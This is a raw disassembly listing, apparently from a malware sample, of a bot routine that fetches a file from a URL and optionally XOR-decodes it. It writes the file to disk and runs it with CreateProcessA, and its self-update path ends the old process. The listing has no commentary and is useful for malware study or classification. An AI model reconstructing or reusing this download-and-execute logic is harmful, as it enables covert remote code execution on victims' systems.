Assembly Code of File sub_401F06
sub_401EE9 proc near ; CODE XREF: sub_401F06 + 109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [ esp + arg_0 ]
xor ecx, ecx
cmp [ esp + arg_4 ], ecx
jle short locret_401F05
loc_401EF5: ; CODE XREF: sub_401EE9 + 1A�j
mov dl, byte_42AE5C
xor [ ecx + eax ], dl
inc ecx
cmp ecx, [ esp + arg_4 ]
jl short loc_401EF5
locret_401F05: ; CODE XREF: sub_401EE9 + A�j
retn
sub_401EE9 endp
########################## SUBROUTINE ##########################
sub_401F06 proc near ; DATA XREF: sub_4078FA + 287E�o
; sub_4078FA + 2D24�o
var_88C = qword ptr - 88Ch
var_880 = qword ptr - 880h
var_810 = byte ptr - 810h
var_610 = byte ptr - 610h
var_410 = dword ptr - 410h
var_40C = byte ptr - 40Ch
var_38C = byte ptr - 38Ch
var_28C = byte ptr - 28Ch
var_18C = byte ptr - 18Ch
var_8C = dword ptr - 8Ch
var_88 = dword ptr - 88h
var_84 = dword ptr - 84h
var_80 = dword ptr - 80h
var_78 = dword ptr - 78h
var_74 = dword ptr - 74h
var_70 = dword ptr - 70h
var_68 = dword ptr - 68h
var_5C = dword ptr - 5Ch
var_3C = dword ptr - 3Ch
var_38 = word ptr - 38h
var_24 = byte ptr - 24h
var_14 = byte ptr - 14h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ ebp + arg_0 ]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ ebp + var_410 ]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [ eax + 3A4h ], esi
push ebx
lea eax, [ ebp + var_38C ]
push eax
push dword_4335E0
call dword_4334A8 ; InternetOpenUrlA
cmp eax, ebx
mov [ ebp + var_C ], eax
jz loc_4023B5
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ ebp + var_28C ]
push eax
call ds:dword_41F03C ; CreateFileA
cmp eax, esi
mov [ ebp + var_10 ], eax
jnb short loc_401FCD
lea eax, [ ebp + var_28C ]
push eax
lea eax, [ ebp + var_610 ]
push offset aDownloadCouldn ; \"[ DOWNLOAD ]: Couldn't open file: %s.\"
push eax
call sub_412BB5
add esp, 0Ch
cmp [ ebp + var_74 ], ebx
jnz short loc_401FB0
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
add esp, 14h
loc_401FB0: ; CODE XREF: sub_401F06 + 88�j
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
push [ ebp + var_8C ]
call sub_4111AE
pop ecx
jmp loc_402416
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401FCD: ; CODE XREF: sub_401F06 + 68�j
xor esi, esi
call ds:dword_41F004 ; GetTickCount
mov [ ebp + var_4 ], eax
loc_401FD8: ; CODE XREF: sub_401F06 + 174�j
xor eax, eax
mov ecx, 80h
lea edi, [ ebp + var_610 ]
rep stosd
lea eax, [ ebp + arg_0 ]
push eax
push 200h
lea eax, [ ebp + var_610 ]
push eax
push [ ebp + var_C ]
call dword_43354C ; InternetReadFile
cmp [ ebp + var_78 ], ebx
jz short loc_402016
push [ ebp + arg_0 ]
lea eax, [ ebp + var_610 ]
push eax
call sub_401EE9
pop ecx
pop ecx
loc_402016: ; CODE XREF: sub_401F06 + FD�j
push ebx
lea eax, [ ebp + var_14 ]
push eax
push [ ebp + arg_0 ]
lea eax, [ ebp + var_610 ]
push eax
push [ ebp + var_10 ]
call ds:dword_41F038 ; WriteFile
add esi, [ ebp + arg_0 ]
cmp [ ebp + var_80 ], ebx
jz short loc_40203B
cmp esi, [ ebp + var_80 ]
ja short loc_402080
loc_40203B: ; CODE XREF: sub_401F06 + 12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ ebp + var_38C ]
push eax
mov eax, [ ebp + var_8C ]
imul eax, 234h
add eax, offset dword_434138
cmp [ ebp + var_88 ], 1
jz short loc_402069
push offset aDownloadFileDo ; \"[ DOWNLOAD ]: File download: %s (%dKB tra\"...
jmp short loc_40206E
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_402069: ; CODE XREF: sub_401F06 + 15A�j
push offset aDownloadUpdate ; \"[ DOWNLOAD ]: Update: %s (%dKB transferre\"...
loc_40206E: ; CODE XREF: sub_401F06 + 161�j
push eax
call sub_412BB5
add esp, 10h
cmp [ ebp + arg_0 ], ebx
ja loc_401FD8
loc_402080: ; CODE XREF: sub_401F06 + 133�j
cmp [ ebp + var_80 ], ebx
mov [ ebp + var_8 ], 1
jz short loc_4020D5
cmp esi, [ ebp + var_80 ]
jz short loc_4020D5
push [ ebp + var_80 ]
lea eax, [ ebp + var_610 ]
push esi
push offset aDownloadFilesi ; \"[ DOWNLOAD ]: Filesize is incorrect: (%d \"...
push eax
mov [ ebp + var_8 ], ebx
call sub_412BB5
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
add esp, 28h
loc_4020D5: ; CODE XREF: sub_401F06 + 184�j
; sub_401F06 + 189�j
call ds:dword_41F004 ; GetTickCount
sub eax, [ ebp + var_4 ]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ ebp + var_10 ]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_41F034 ; CloseHandle
cmp [ ebp + var_8 ], ebx
jz loc_402402
cmp [ ebp + var_88 ], 1
jz loc_4022C6
test edi, edi
mov [ ebp + var_4 ], edi
fild [ ebp + var_4 ]
jge short loc_402121
fadd ds:dbl_41FAD8
loc_402121: ; CODE XREF: sub_401F06 + 213�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [ esp + 880h + var_880 ]
lea eax, [ ebp + var_28C ]
mov [ ebp + var_4 ], esi
fild [ ebp + var_4 ]
push eax
jge short loc_402143
fadd ds:dbl_41FAD8
loc_402143: ; CODE XREF: sub_401F06 + 235�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ ebp + var_610 ]
fstp [ esp + 88Ch + var_88C ]
push offset aDownloadDownlo ; \"[ DOWNLOAD ]: Downloaded %.1f KB to %s @ \"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ ebp + var_74 ], ebx
jnz short loc_402187
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
add esp, 14h
loc_402187: ; CODE XREF: sub_401F06 + 25F�j
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
cmp [ ebp + var_84 ], 1
pop ecx
jnz loc_402402
cmp [ ebp + var_74 ], ebx
jnz short loc_4021F1
lea eax, [ ebp + var_18C ]
push eax
lea eax, [ ebp + var_28C ]
push eax
lea eax, [ ebp + var_610 ]
push offset aDownloadOpenni ; \"[ DOWNLOAD ]: Openning: %s %s.\"
push eax
call sub_412BB5
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
add esp, 28h
loc_4021F1: ; CODE XREF: sub_401F06 + 29E�j
xor eax, eax
lea edi, [ ebp + var_24 ]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ ebp + var_68 ]
rep stosd
mov ecx, 80h
lea edi, [ ebp + var_810 ]
mov [ ebp + var_5C ], (offset asc_41FA74 + 2)
mov [ ebp + var_68 ], 44h
mov [ ebp + var_3C ], 1
mov [ ebp + var_38 ], bx
rep stosd
loc_40222A: ; CODE XREF: sub_401F06 + 335�j
mov cl, [ ebp + eax + var_28C ]
mov [ ebp + eax + var_810 ], cl
inc eax
cmp cl, bl
jnz short loc_40222A
lea edi, [ ebp + var_810 ]
dec edi
loc_402244: ; CODE XREF: sub_401F06 + 344�j
mov al, [ edi + 1 ]
inc edi
cmp al, bl
jnz short loc_402244
mov esi, offset asc_41FA74 ; \" \"
lea eax, [ ebp + var_18C ]
movsw
mov edx, eax
loc_40225B: ; CODE XREF: sub_401F06 + 35A�j
mov cl, [ eax ]
inc eax
cmp cl, bl
jnz short loc_40225B
lea edi, [ ebp + var_810 ]
sub eax, edx
dec edi
loc_40226B: ; CODE XREF: sub_401F06 + 36B�j
mov cl, [ edi + 1 ]
inc edi
cmp cl, bl
jnz short loc_40226B
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ ebp + var_24 ]
push eax
lea eax, [ ebp + var_68 ]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ ebp + var_810 ]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_41F030 ; CreateProcessA
cmp eax, 1
lea eax, [ ebp + var_810 ]
push eax
lea eax, [ ebp + var_610 ]
jnz short loc_4022BC
push offset aDownloadApplic ; \"[ DOWNLOAD ]: Application succesfully exe\"...
jmp loc_4023C7
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4022BC: ; CODE XREF: sub_401F06 + 3AA�j
push offset aDownloadExecut ; \"[ DOWNLOAD ]: Execution failed: Error exe\"...
jmp loc_4023C7
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4022C6: ; CODE XREF: sub_401F06 + 205�j
test edi, edi
mov [ ebp + var_4 ], edi
fild [ ebp + var_4 ]
jge short loc_4022D6
fadd ds:dbl_41FAD8
loc_4022D6: ; CODE XREF: sub_401F06 + 3C8�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [ esp + 880h + var_880 ]
lea eax, [ ebp + var_28C ]
mov [ ebp + var_4 ], esi
fild [ ebp + var_4 ]
push eax
jge short loc_4022F8
fadd ds:dbl_41FAD8
loc_4022F8: ; CODE XREF: sub_401F06 + 3EA�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ ebp + var_610 ]
fstp [ esp + 88Ch + var_88C ]
push offset aDownloadDown_0 ; \"[ DOWNLOAD ]: Downloaded %.1fKB to %s @ %\"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ ebp + var_74 ], ebx
jnz short loc_40233C
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
add esp, 14h
loc_40233C: ; CODE XREF: sub_401F06 + 414�j
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
xor eax, eax
pop ecx
lea edi, [ ebp + var_24 ]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ ebp + var_68 ]
rep stosd
lea eax, [ ebp + var_24 ]
push eax
lea eax, [ ebp + var_68 ]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ ebp + var_28C ]
xor esi, esi
push eax
inc esi
push ebx
mov [ ebp + var_5C ], (offset asc_41FA74 + 2)
mov [ ebp + var_68 ], 44h
mov [ ebp + var_3C ], esi
mov [ ebp + var_38 ], bx
call ds:dword_41F030 ; CreateProcessA
cmp eax, esi
jnz short loc_4023A7
call dword_4335B8 ; WSACleanup
call sub_405915
push ebx
call ds:dword_41F02C ; ExitProcess
loc_4023A7: ; CODE XREF: sub_401F06 + 48D�j
lea eax, [ ebp + var_28C ]
push eax
push offset aDownloadUpda_0 ; \"[ DOWNLOAD ]: Update failed: Error execut\"...
jmp short loc_4023C1
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4023B5: ; CODE XREF: sub_401F06 + 45�j
lea eax, [ ebp + var_38C ]
push eax
push offset aDownloadBadUrl ; \"[ DOWNLOAD ]: Bad URL, or DNS Error: %s.\"
loc_4023C1: ; CODE XREF: sub_401F06 + 4AD�j
lea eax, [ ebp + var_610 ]
loc_4023C7: ; CODE XREF: sub_401F06 + 3B1�j
; sub_401F06 + 3BB�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ ebp + var_74 ], ebx
jnz short loc_4023F5
push ebx
push [ ebp + var_70 ]
lea eax, [ ebp + var_610 ]
push eax
lea eax, [ ebp + var_40C ]
push eax
push [ ebp + var_410 ]
call sub_4045DD
add esp, 14h
loc_4023F5: ; CODE XREF: sub_401F06 + 4CD�j
lea eax, [ ebp + var_610 ]
push eax
call sub_401C33
pop ecx
loc_402402: ; CODE XREF: sub_401F06 + 1F8�j
; sub_401F06 + 295�j
push [ ebp + var_C ]
call dword_4334FC ; InternetCloseHandle
push [ ebp + var_8C ]
call sub_4111AE
loc_402416: ; CODE XREF: sub_401F06 + C2�j
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_401F06 endp ; sp - analysis failed